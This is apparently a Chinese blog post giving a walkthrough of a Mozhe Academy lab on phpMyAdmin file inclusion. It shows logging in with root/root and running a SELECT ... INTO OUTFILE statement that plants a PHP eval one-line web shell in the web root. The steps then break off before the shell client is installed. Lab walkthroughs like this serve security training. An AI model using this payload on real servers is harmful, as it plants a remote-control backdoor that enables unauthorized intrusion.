信息安全 - phpMyAdmin后台文件包含分析溯源
题目链接
https://www.mozhe.cn/bug/detail/RDM4VFA0aHFWT25Na09mdmhqcklxdz09bW96aGUmozhe
操作步骤
-
进入“墨者学院”,然后点击“在线靶场”,找到“phpMyAdmin后台文件包含分析溯源”。
-
undefined
-
之后“启动靶场环境”这几个字会变成“提交KEY”。
-
同时我们会看见有一行写着:IP地址 : 219.153.49.228 端口 : 41479。这时候新开一个标签页,网址写:
IP地址:端口号 (本题就是 219.153.49.228:41479)。
回车进入该网址,我们会看到:(用户名:root;密码:root)
undefined**** -
把以下这句代码复制到第一块空白区域,然后点击执行。
select "<?php eval($_POST[pass]);?>" into outfile "/var/www/html/20200902.php"
-
安装菜刀,晚一点更,因为我的是MAC……
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· 浏览器原生「磁吸」效果!Anchor Positioning 锚点定位神器解析
· 没有源码,如何修改代码逻辑?
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 记一次.NET内存居高不下排查解决与启示
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
· DeepSeek 开源周回顾「GitHub 热点速览」
2019-11-06 POJ3356-AGTC-dp+字符串处理